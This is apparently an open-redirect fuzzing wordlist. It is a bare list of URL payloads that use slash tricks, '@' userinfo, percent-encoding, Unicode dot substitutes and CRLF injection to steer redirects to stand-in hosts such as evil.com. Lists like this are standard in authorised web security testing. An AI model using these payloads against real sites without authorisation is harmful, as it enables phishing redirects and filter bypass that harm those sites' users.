//example.com@google.com/%2f..
///google.com/%2f..
///example.com@google.com/%2f..
////google.com/%2f..
https://google.com/%2f..
https://example.com@google.com/%2f..
/https://google.com/%2f..
/https://example.com@google.com/%2f..
//google.com/%2f%2e%2e
//example.com@google.com/%2f%2e%2e
///google.com/%2f%2e%2e
///example.com@google.com/%2f%2e%2e
////google.com/%2f%2e%2e
/http://example.com
/http:/example.com
/https:/%5cexample.com/
/https://%09/example.com
/https://%5cexample.com
/https:///example.com/%2e%2e
/https:///example.com/%2f%2e%2e
/https://example.com
/https://example.com/
/https://example.com/%2e%2e
/https://example.com/%2e%2e%2f
/https://example.com/%2f%2e%2e
/https://example.com/%2f..
/https://example.com//
/https:example.com
/%09/example.com
/%2f%2fexample.com
/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
/%5cexample.com
/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
.example.com
/.example.com
//%09/example.com
//%5cexample.com
///%09/example.com
///%5cexample.com
////%09/example.com
////%5cexample.com
/////example.com
/////example.com/
////\;@example.com
////example.com/
//evil%E3%80%82com
////evil%E3%80%82com
////evil%E3%80%82com
http:/evil%E3%80%82com
.%2fhttp:/evil%E3%80%82com/
.%2fhttp:/evil%E3%80%82com
%2fhttp:/evil%E3%80%82com
evil%E3%80%82com
////%E3%80%82evil.com
नमस्ते.भारत
https://tagassistant.google.com/debug/clearcookies?url=https://evil.com
//evil.com
http:/evil.com
.%2fhttp:/evil.com/
.%2fhttp:/evil.com
%2fhttp:/evil.com
%0dhttp:/evil.com
%0devil.com
%0d//evil.com
%0d%0ahttp:/evil.com
%0d%0aevil.com
%0d%0a//evil.com
